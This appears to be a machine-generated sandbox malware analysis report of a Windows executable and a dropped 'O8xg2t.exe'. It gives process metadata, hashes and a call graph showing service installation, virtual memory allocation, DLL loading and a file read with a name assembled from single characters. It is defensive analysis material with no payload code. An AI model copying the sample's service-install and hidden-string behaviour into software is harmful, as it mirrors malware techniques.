                                Path:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\287438657364-7643738421.08.exe"
                                Imagebase:0x140000000
                                File size:30'886'912 bytes
                                MD5 hash:12771744B7DE8FFB1F0DDDF3AC8ED2F4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:6
                                Start time:22:15:48
                                Start date:06/01/2025
                                Path:C:\Users\user\Documents\O8xg2t.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\Documents\O8xg2t.exe
                                Imagebase:0x140000000
                                File size:133'136 bytes
                                MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 0%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:7
                                Start time:22:15:50
                                Start date:06/01/2025
                                Path:C:\Users\user\Documents\O8xg2t.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\Documents\O8xg2t.exe
                                Imagebase:0x140000000
                                File size:133'136 bytes
                                MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:9
                                Start time:22:16:01
                                Start date:06/01/2025
                                Path:C:\Users\user\Documents\O8xg2t.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\Documents\O8xg2t.exe
                                Imagebase:0x140000000
                                File size:133'136 bytes
                                MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:2.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:30.8%
                                  Total number of Nodes:480
                                  Total number of Limit Nodes:7
                                  execution_graph 13953 140005df3 13954 140005e71 13953->13954 13955 140005e84 CreateFileA 13954->13955 13956 140005f50 _CreateFrameInfo 13955->13956 13957 140005fc3 malloc ReadFile 13956->13957 15409 140007412 15412 140007333 15409->15412 15410 140007403 15411 1400073e0 LdrLoadDll 15411->15412 15412->15410 15412->15411 15416 7ffbc32011b0 15423 7ffbc3201209 15416->15423 15417 7ffbc3201b90 51 API calls 15434 7ffbc3201300 BuildCatchObjectHelperInternal 15417->15434 15418 7ffbc32014f0 15449 7ffbc3201a40 15418->15449 15419 7ffbc3201b70 BuildCatchObjectHelperInternal 8 API calls 15422 7ffbc32014d3 15419->15422 15420 7ffbc32012c7 15426 7ffbc3201b90 51 API calls 15420->15426 15421 7ffbc320129e 15425 7ffbc32014f6 15421->15425 15435 7ffbc3201b90 15421->15435 15423->15418 15423->15420 15423->15421 15429 7ffbc32012b9 BuildCatchObjectHelperInternal 15423->15429 15423->15434 15452 7ffbc3201110 15425->15452 15426->15429 15429->15417 15432 7ffbc32014eb 15444 7ffbc32079cc 15432->15444 15434->15419 15438 7ffbc3201b9b 15435->15438 15436 7ffbc32012b0 15436->15429 15436->15432 15437 7ffbc3207a4c BuildCatchObjectHelperInternal 2 API calls 15437->15438 15438->15436 15438->15437 15439 7ffbc3201bba 15438->15439 15440 7ffbc3201bc5 15439->15440 15458 7ffbc32021f0 15439->15458 15442 7ffbc3201110 Concurrency::cancel_current_task 51 API calls 15440->15442 15443 7ffbc3201bcb 15442->15443 15445 7ffbc3207844 _invalid_parameter_noinfo 47 API calls 15444->15445 15446 7ffbc32079e5 15445->15446 15447 7ffbc32079fc _invalid_parameter_noinfo_noreturn 17 API calls 15446->15447 15448 7ffbc32079fa 15447->15448 15462 7ffbc3201b34 15449->15462 15453 7ffbc320111e Concurrency::cancel_current_task 15452->15453 15454 7ffbc3203990 Concurrency::cancel_current_task 2 API calls 15453->15454 15455 7ffbc320112f 15454->15455 15456 7ffbc320379c __std_exception_copy 49 API calls 15455->15456 15457 7ffbc3201159 15456->15457 15459 7ffbc32021fe Concurrency::cancel_current_task 15458->15459 15460 7ffbc3203990 Concurrency::cancel_current_task 2 API calls 15459->15460 15461 7ffbc320220f 15460->15461 15467 7ffbc3201ab0 15462->15467 15465 7ffbc3203990 Concurrency::cancel_current_task 2 API calls 15466 7ffbc3201b56 15465->15466 15470 7ffbc320379c 15467->15470 15471 7ffbc3201ae4 15470->15471 15472 7ffbc32037bd 15470->15472 15471->15465 15472->15471 15473 7ffbc32037f2 15472->15473 15476 7ffbc32089bc 15472->15476 15485 7ffbc3207b58 15473->15485 15477 7ffbc32089d3 15476->15477 15478 7ffbc32089c9 15476->15478 15479 7ffbc3208bc0 __free_lconv_mon 11 API calls 15477->15479 15478->15477 15483 7ffbc32089ee 15478->15483 15480 7ffbc32089da 15479->15480 15482 7ffbc32079ac _invalid_parameter_noinfo 47 API calls 15480->15482 15481 7ffbc32089e6 15481->15473 15482->15481 15483->15481 15484 7ffbc3208bc0 __free_lconv_mon 11 API calls 15483->15484 15484->15480 15486 7ffbc3208be0 15485->15486 15487 7ffbc3208be5 HeapFree 15486->15487 15489 7ffbc3208c16 15486->15489 15488 7ffbc3208c00 GetLastError 15487->15488 15487->15489 15490 7ffbc3208c0d __free_lconv_mon 15488->15490 15489->15471 15491 7ffbc3208bc0 __free_lconv_mon 11 API calls 15490->15491 15491->15489 15825 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15828 1400054e0 15825->15828 15827 1400136ef 15829 140005506 _lock 15828->15829 15830 14000552c 15828->15830 15829->15827 15831 1400074d0 LdrLoadDll 15830->15831 15832 140005536 15831->15832 15833 140008370 3 API calls 15832->15833 15837 140005545 _CreateFrameInfo 15833->15837 15834 1400055b8 15835 140008de0 _lock 2 API calls 15834->15835 15836 1400055c0 sprintf_s 15835->15836 15836->15829 15837->15834 15838 1400074f0 LdrLoadDll 15837->15838 15839 140005561 CreateThread 15838->15839 15839->15836 15840 1400055b0 GetLastError 15839->15840 15840->15834 13962 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13963 140005ab1 13962->13963 13964 140005add GetVersionExA 13962->13964 13967 140005abf 13963->13967 14012 140009540 13963->14012 13965 140005b0e GetProcessHeap HeapFree 13964->13965 13966 140005af0 GetProcessHeap HeapFree 13964->13966 13972 140005b3c 13965->13972 13968 140005d0b 13966->13968 14020 140009300 13967->14020 13971 140005ac9 14031 140008510 GetModuleHandleA 13971->14031 14035 14000a310 HeapCreate 13972->14035 13975 140005bec 13976 140005c12 13975->13976 13977 140005bf0 13975->13977 13981 140005c17 13976->13981 13978 140005bfe 13977->13978 13979 140009540 _lock 12 API calls 13977->13979 13980 140009300 _lock 10 API calls 13978->13980 13979->13978 13982 140005c08 13980->13982 13983 140005c3d 13981->13983 13985 140005c29 13981->13985 13986 140009540 _lock 12 API calls 13981->13986 13984 140008510 _lock 3 API calls 13982->13984 14038 140009f50 GetStartupInfoA 13983->14038 13984->13976 13987 140009300 _lock 10 API calls 13985->13987 13986->13985 13988 140005c33 13987->13988 13990 140008510 _lock 3 API calls 13988->13990 13990->13983 13992 140005c56 14058 140009e30 13992->14058 13995 140005c5b 14076 140009c30 13995->14076 13999 140005c73 14000 140005c81 13999->14000 14001 1400084e0 _lock 12 API calls 13999->14001 14106 140009690 14000->14106 14001->14000 14003 140005c86 14004 140005c94 14003->14004 14005 1400084e0 _lock 12 API calls 14003->14005 14118 140008650 14004->14118 14005->14004 14007 140005c9e 14008 1400084e0 _lock 12 API calls 14007->14008 14009 140005ca9 14007->14009 14008->14009 14122 140001520 14009->14122 14011 140005ad3 14011->13968 14013 14000954e _lock 14012->14013 14014 14000961c 14013->14014 14015 14000959c 14013->14015 14017 1400095c9 GetStdHandle 14013->14017 14014->13967 14016 140009300 _lock 10 API calls 14015->14016 14016->14014 14017->14015 14018 1400095dc 14017->14018 14018->14015 14019 1400095e2 WriteFile 14018->14019 14019->14015 14024 140009320 _lock 14020->14024 14021 140009330 14021->13971 14022 1400094dc GetStdHandle 14022->14021 14023 1400094ef 14022->14023 14023->14021 14025 1400094f5 WriteFile 14023->14025 14024->14021 14024->14022 14026 140009375 _lock 14024->14026 14025->14021 14026->14021 14027 1400093b9 GetModuleFileNameA 14026->14027 14028 1400093d9 _lock 14027->14028 14140 14000f000 14028->14140 14032 140008543 ExitProcess 14031->14032 14033 14000852a GetProcAddress 14031->14033 14033->14032 14034 14000853f 14033->14034 14034->14032 14036 14000a334 14035->14036 14037 14000a339 HeapSetInformation 14035->14037 14036->13975 14037->13975 14166 140008370 14038->14166 14040 140005c48 14040->13992 14051 1400084e0 14040->14051 14041 14000a1c4 GetStdHandle 14045 14000a17c 14041->14045 14042 140008370 3 API calls 14046 140009f8a 14042->14046 14043 14000a239 SetHandleCount 14043->14040 14044 14000a1d8 GetFileType 14044->14045 14045->14040 14045->14041 14045->14043 14045->14044 14050 14000edc0 _lock 3 API calls 14045->14050 14046->14040 14046->14042 14046->14045 14046->14046 14047 14000a0e3 14046->14047 14047->14040 14047->14045 14048 14000a11c GetFileType 14047->14048 14171 14000edc0 14047->14171 14048->14047 14050->14045 14052 140009540 _lock 12 API calls 14051->14052 14053 1400084ed 14052->14053 14054 140009300 _lock 10 API calls 14053->14054 14055 1400084f4 14054->14055 14056 1400073e0 _lock LdrLoadDll 14055->14056 14057 140008500 14056->14057 14059 140009e7c 14058->14059 14060 140009e3e GetCommandLineW 14058->14060 14061 140009e81 GetCommandLineW 14059->14061 14062 140009e69 14059->14062 14063 140009e49 GetCommandLineW 14060->14063 14064 140009e5e GetLastError 14060->14064 14061->14062 14065 140009e75 14062->14065 14066 140009e91 GetCommandLineA MultiByteToWideChar 14062->14066 14063->14064 14064->14062 14064->14065 14065->13995 14067 140009ec8 14066->14067 14068 140009ed9 14066->14068 14067->13995 14069 140008370 3 API calls 14068->14069 14070 140009eeb 14069->14070 14071 140009f32 14070->14071 14072 140009ef3 MultiByteToWideChar 14070->14072 14071->13995 14073 140009f13 14072->14073 14074 140009f2a 14072->14074 14073->13995 14185 140008de0 14074->14185 14077 140009c52 GetEnvironmentStringsW 14076->14077 14078 140009c86 14076->14078 14079 140009c6c GetLastError 14077->14079 14085 140009c60 14077->14085 14080 140009c91 GetEnvironmentStringsW 14078->14080 14081 140009c77 14078->14081 14079->14078 14079->14081 14080->14085 14096 140005c67 14080->14096 14082 140009d09 GetEnvironmentStrings 14081->14082 14081->14096 14083 140009d17 14082->14083 14082->14096 14084 140009d58 14083->14084 14087 140009d20 MultiByteToWideChar 14083->14087 14088 140008370 3 API calls 14084->14088 14190 140008300 14085->14190 14087->14083 14087->14096 14090 140009d68 14088->14090 14093 140009d70 FreeEnvironmentStringsA 14090->14093 14098 140009d7d 14090->14098 14091 140009ce1 __SehTransFilter 14094 140009cef FreeEnvironmentStringsW 14091->14094 14092 140009cd1 FreeEnvironmentStringsW 14092->14096 14093->14096 14094->14096 14095 140009de5 FreeEnvironmentStringsA 14095->14096 14102 1400099c0 GetModuleFileNameW 14096->14102 14097 140009d90 MultiByteToWideChar 14097->14098 14099 140009e0e 14097->14099 14098->14095 14098->14097 14100 140008de0 _lock 2 API calls 14099->14100 14101 140009e16 FreeEnvironmentStringsA 14100->14101 14101->14096 14104 140009a03 14102->14104 14103 140008300 _lock 17 API calls 14105 140009bca 14103->14105 14104->14103 14104->14105 14105->13999 14107 1400096a8 14106->14107 14108 1400096b2 14106->14108 14107->14003 14109 140008370 3 API calls 14108->14109 14117 1400096fa 14109->14117 14110 140009709 14110->14003 14111 1400097a5 14112 140008de0 _lock 2 API calls 14111->14112 14113 1400097b4 14112->14113 14113->14003 14114 140008370 3 API calls 14114->14117 14115 1400097e5 14116 140008de0 _lock 2 API calls 14115->14116 14116->14113 14117->14110 14117->14111 14117->14114 14117->14115 14119 140008666 14118->14119 14121 1400086bf 14119->14121 14206 140005380 14119->14206 14121->14007 14123 140001565 14122->14123 14124 140001569 14123->14124 14125 14000157e 14123->14125 14244 140001430 GetModuleFileNameW OpenSCManagerW 14124->14244 14128 140001595 OpenSCManagerW 14125->14128 14129 14000164f 14125->14129 14130 1400015b2 GetLastError 14128->14130 14131 1400015cf OpenServiceW 14128->14131 14132 140001654 14129->14132 14133 140001669 StartServiceCtrlDispatcherW 14129->14133 14130->14011 14134 140001611 DeleteService 14131->14134 14135 1400015e9 GetLastError CloseServiceHandle 14131->14135 14253 1400011f0 14132->14253 14133->14011 14137 140001626 CloseServiceHandle CloseServiceHandle 14134->14137 14138 14000161e GetLastError 14134->14138 14135->14011 14137->14011 14138->14137 14141 14000f01e __SehTransFilter 14140->14141 14142 14000f03b LoadLibraryA 14141->14142 14145 14000f125 _lock 14141->14145 14143 14000f054 GetProcAddress 14142->14143 14144 1400094c9 14142->14144 14143->14144 14147 14000f06d _lock 14143->14147 14144->13971 14146 14000f165 14145->14146 14163 1400073e0 LdrLoadDll 14145->14163 14149 1400073e0 _lock LdrLoadDll 14146->14149 14159 14000f1a3 _lock 14146->14159 14152 14000f075 GetProcAddress 14147->14152 14148 1400073e0 _lock LdrLoadDll 14148->14144 14157 14000f1e9 14149->14157 14154 140007220 _lock 14152->14154 14153 1400073e0 _lock LdrLoadDll 14153->14146 14155 14000f094 GetProcAddress 14154->14155 14156 14000f0b3 _lock 14155->14156 14156->14145 14160 14000f0e9 GetProcAddress 14156->14160 14158 1400073e0 _lock LdrLoadDll 14157->14158 14157->14159 14158->14159 14159->14148 14161 14000f101 _lock 14160->14161 14161->14145 14162 14000f10d GetProcAddress 14161->14162 14162->14145 14165 140007333 14163->14165 14164 140007403 14164->14153 14165->14163 14165->14164 14167 1400083a0 14166->14167 14169 1400083e0 14167->14169 14170 1400083be Sleep 14167->14170 14177 14000e850 14167->14177 14169->14046 14170->14167 14170->14169 14172 1400073e0 _lock LdrLoadDll 14171->14172 14173 14000edec _lock 14172->14173 14174 14000ee1d _lock 14173->14174 14175 14000ee26 GetModuleHandleA 14173->14175 14174->14047 14175->14174 14176 14000ee38 GetProcAddress 14175->14176 14176->14174 14178 14000e865 14177->14178 14179 14000e8be HeapAlloc 14178->14179 14181 14000e876 _lock 14178->14181 14182 1400090b0 14178->14182 14179->14178 14179->14181 14181->14167 14183 1400073e0 _lock LdrLoadDll 14182->14183 14184 1400090c5 14183->14184 14184->14178 14186 140008de9 HeapFree 14185->14186 14187 140008e19 _lock 14185->14187 14186->14187 14188 140008dff _lock 14186->14188 14187->14071 14189 140008e09 GetLastError 14188->14189 14189->14187 14191 140008320 14190->14191 14193 140008358 14191->14193 14194 140008338 Sleep 14191->14194 14195 1400090f0 14191->14195 14193->14091 14193->14092 14194->14191 14194->14193 14196 14000919e 14195->14196 14203 140009103 14195->14203 14197 1400090b0 _lock LdrLoadDll 14196->14197 14199 1400091a3 _lock 14197->14199 14198 14000914c HeapAlloc 14198->14203 14204 140009173 _lock 14198->14204 14199->14191 14200 140009540 _lock 12 API calls 14200->14203 14201 140009300 _lock 10 API calls 14201->14203 14202 1400090b0 _lock LdrLoadDll 14202->14203 14203->14198 14203->14200 14203->14201 14203->14202 14203->14204 14205 140008510 _lock 3 API calls 14203->14205 14204->14191 14205->14203 14209 140005250 14206->14209 14208 140005389 14208->14121 14210 140005271 14209->14210 14211 1400073e0 _lock LdrLoadDll 14210->14211 14212 14000527e 14211->14212 14213 1400073e0 _lock LdrLoadDll 14212->14213 14214 14000528d 14213->14214 14220 1400052f0 _lock 14214->14220 14221 140008490 14214->14221 14216 1400052b5 14217 1400052d9 14216->14217 14216->14220 14224 140008400 14216->14224 14219 140008400 7 API calls 14217->14219 14217->14220 14219->14220 14220->14208 14222 1400084c5 HeapSize 14221->14222 14223 140008499 _lock 14221->14223 14223->14216 14226 140008430 14224->14226 14227 140008472 14226->14227 14228 140008450 Sleep 14226->14228 14229 14000e920 14226->14229 14227->14217 14228->14226 14228->14227 14230 14000e935 14229->14230 14231 14000e94c 14230->14231 14240 14000e95e 14230->14240 14232 140008de0 _lock 2 API calls 14231->14232 14234 14000e951 14232->14234 14233 14000e9b1 14236 1400090b0 _lock LdrLoadDll 14233->14236 14234->14226 14235 14000e973 HeapReAlloc 14235->14240 14243 14000e9b9 _lock 14235->14243 14236->14243 14237 14000e9f4 _lock 14239 14000e9f9 GetLastError 14237->14239 14238 1400090b0 _lock LdrLoadDll 14238->14240 14239->14243 14240->14233 14240->14235 14240->14237 14240->14238 14241 14000e9db _lock 14240->14241 14242 14000e9e0 GetLastError 14241->14242 14242->14243 14243->14226 14245 140001482 CreateServiceW 14244->14245 14246 14000147a GetLastError 14244->14246 14248 1400014ea GetLastError 14245->14248 14249 1400014df CloseServiceHandle 14245->14249 14247 1400014fd 14246->14247 14259 140004f30 14247->14259 14250 1400014f2 CloseServiceHandle 14248->14250 14249->14250 14250->14247 14252 14000150d 14252->14011 14254 1400011fa 14253->14254 14268 1400051d0 14254->14268 14257 140004f30 sprintf_s NtAllocateVirtualMemory 14258 140001262 14257->14258 14258->14011 14261 140004f39 _CreateFrameInfo 14259->14261 14260 140004f44 14260->14252 14261->14260 14264 140006c95 14261->14264 14263 14000660e sprintf_s 14263->14252 14266 140006d7b 14264->14266 14267 140006d9d 14264->14267 14265 140006f95 NtAllocateVirtualMemory 14265->14267 14266->14265 14266->14267 14267->14263 14271 140008270 14268->14271 14270 140001238 MessageBoxW 14270->14257 14272 1400082ac _lock 14271->14272 14273 14000827e 14271->14273 14272->14270 14273->14272 14275 140008120 14273->14275 14276 14000813b _lock 14275->14276 14277 14000816a 14275->14277 14276->14272 14277->14276 14279 1400081d7 14277->14279 14281 140007f50 14277->14281 14279->14276 14280 140007f50 sprintf_s 54 API calls 14279->14280 14280->14276 14290 140007f69 sprintf_s 14281->14290 14282 140007f74 _lock 14282->14279 14283 14000801d 14284 1400080d5 14283->14284 14285 14000802f 14283->14285 14287 14000cc00 sprintf_s 54 API calls 14284->14287 14286 14000804c 14285->14286 14289 140008081 14285->14289 14297 14000cc00 14286->14297 14291 140008056 14287->14291 14289->14291 14305 14000c2a0 14289->14305 14290->14282 14290->14283 14294 14000cd50 14290->14294 14291->14279 14295 140008300 _lock 17 API calls 14294->14295 14296 14000cd6a 14295->14296 14296->14283 14298 14000cc3f 14297->14298 14299 14000cc23 _lock sprintf_s 14297->14299 14298->14299 14313 14000fc50 14298->14313 14299->14291 14303 14000ccc5 _lock sprintf_s 14358 14000fd20 LeaveCriticalSection 14303->14358 14306 14000c2e0 14305->14306 14309 14000c2c3 _lock sprintf_s 14305->14309 14307 14000fc50 sprintf_s 25 API calls 14306->14307 14306->14309 14308 14000c34e 14307->14308 14310 14000c1f0 sprintf_s 2 API calls 14308->14310 14311 14000c367 _lock sprintf_s 14308->14311 14309->14291 14310->14311 14392 14000fd20 LeaveCriticalSection 14311->14392 14314 14000fc96 14313->14314 14315 14000fccb 14313->14315 14359 14000b400 14314->14359 14316 14000ccac 14315->14316 14317 14000fccf EnterCriticalSection 14315->14317 14316->14303 14323 14000c3f0 14316->14323 14317->14316 14326 14000c42e 14323->14326 14342 14000c427 _lock sprintf_s 14323->14342 14324 140004f30 sprintf_s NtAllocateVirtualMemory 14325 14000cbe6 14324->14325 14325->14303 14329 14000c4fb sprintf_s _CreateFrameInfo 14326->14329 14326->14342 14386 14000c1f0 14326->14386 14328 14000c841 14330 14000c86a 14328->14330 14331 14000cb20 WriteFile 14328->14331 14329->14328 14333 14000c526 GetConsoleMode 14329->14333 14332 14000c936 14330->14332 14338 14000c876 14330->14338 14334 14000cb53 GetLastError 14331->14334 14331->14342 14339 14000c940 14332->14339 14348 14000ca02 14332->14348 14333->14328 14335 14000c557 14333->14335 14334->14342 14335->14328 14336 14000c564 GetConsoleCP 14335->14336 14336->14342 14352 14000c581 sprintf_s 14336->14352 14337 14000c8c5 WriteFile 14337->14338 14340 14000c928 GetLastError 14337->14340 14338->14337 14338->14342 14339->14342 14343 14000c991 WriteFile 14339->14343 14340->14342 14341 14000ca57 WideCharToMultiByte 14344 14000cb15 GetLastError 14341->14344 14341->14348 14342->14324 14343->14339 14345 14000c9f4 GetLastError 14343->14345 14344->14342 14345->14342 14346 14000cab0 WriteFile 14347 14000caf6 GetLastError 14346->14347 14346->14348 14347->14342 14347->14348 14348->14341 14348->14342 14348->14346 14349 14000c649 WideCharToMultiByte 14349->14342 14350 14000c68c WriteFile 14349->14350 14350->14352 14353 14000c80d GetLastError 14350->14353 14351 14000c829 GetLastError 14351->14342 14352->14342 14352->14349 14352->14351 14354 14000fd50 7 API calls sprintf_s 14352->14354 14355 14000c6e2 WriteFile 14352->14355 14357 14000c81b GetLastError 14352->14357 14353->14342 14354->14352 14355->14352 14356 14000c7ff GetLastError 14355->14356 14356->14342 14357->14342 14360 14000b41e 14359->14360 14361 14000b42f EnterCriticalSection 14359->14361 14365 14000b2f0 14360->14365 14363 14000b423 14363->14361 14364 1400084e0 _lock 12 API calls 14363->14364 14364->14361 14366 14000b317 14365->14366 14367 14000b32e 14365->14367 14368 140009540 _lock 12 API calls 14366->14368 14370 140008300 _lock 17 API calls 14367->14370 14377 14000b342 _lock 14367->14377 14369 14000b31c 14368->14369 14371 140009300 _lock 10 API calls 14369->14371 14372 14000b350 14370->14372 14373 14000b324 14371->14373 14375 14000b400 _lock 22 API calls 14372->14375 14372->14377 14374 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14373->14374 14374->14367 14376 14000b371 14375->14376 14378 14000b3a7 14376->14378 14379 14000b379 14376->14379 14377->14363 14381 140008de0 _lock HeapFree GetLastError 14378->14381 14380 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14379->14380 14382 14000b386 14380->14382 14385 14000b392 _lock 14381->14385 14384 140008de0 _lock HeapFree GetLastError 14382->14384 14382->14385 14383 14000b3b0 LeaveCriticalSection 14383->14377 14384->14385 14385->14383 14387 14000c20c sprintf_s 14386->14387 14388 14000c212 _lock 14387->14388 14389 14000c22c SetFilePointer 14387->14389 14388->14329 14390 14000c254 sprintf_s 14389->14390 14391 14000c24a GetLastError 14389->14391 14390->14329 14391->14390 13958 140006c95 13960 140006d7b 13958->13960 13961 140006d9d 13958->13961 13959 140006f95 NtAllocateVirtualMemory 13959->13961 13960->13959 13960->13961 14393 1400054e0 14394 140005506 _lock 14393->14394 14395 14000552c 14393->14395 14406 1400074d0 14395->14406 14398 140008370 3 API calls 14402 140005545 _CreateFrameInfo 14398->14402 14399 1400055b8 14400 140008de0 _lock 2 API calls 14399->14400 14401 1400055c0 sprintf_s 14400->14401 14401->14394 14402->14399 14410 1400074f0 14402->14410 14405 1400055b0 GetLastError 14405->14399 14408 140007333 14406->14408 14407 140005536 14407->14398 14408->14407 14409 1400073e0 LdrLoadDll 14408->14409 14409->14408 14412 140007333 14410->14412 14411 140005561 CreateThread 14411->14401 14411->14405 14412->14411 14413 1400073e0 LdrLoadDll 14412->14413 14413->14412

                                  Executed Functions

                                  Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 155 140006f95-140006fd6 NtAllocateVirtualMemory 153->155 156 140006f90 153->156 157 140006f25-140006f2d 154->157 158 140006f2f-140006f33 154->158 155->132 160 140006fdc-140007020 155->160 156->132 159 140006f37-140006f7a 157->159 158->159 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->151 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 176 1400070ad-1400070db 173->176 175 140007064-14000706a 174->175 175->168 177 1400070ea-140007101 176->177 178 140007143 177->178 179 140007103-140007141 177->179 178->175 179->177
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@
                                  • API String ID: 0-149943524
                                  • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                  • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                  • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                  • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00
                                  Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 270 1400074b4 265->270 271 140007480-1400074b3 265->271 267 1400074eb-14000752b 266->267 268 14000752c-140007535 266->268 267->268 272 140007552 268->272 273 140007537-140007554 268->273 270->268 271->270 272->260 273->264 274->256 275->260
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                  • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                  • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                  • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00
                                  Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: File$CreateReadmalloc
                                  • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                  • API String ID: 3950102678-3381721293
                                  • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                  • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                  • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                  • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22
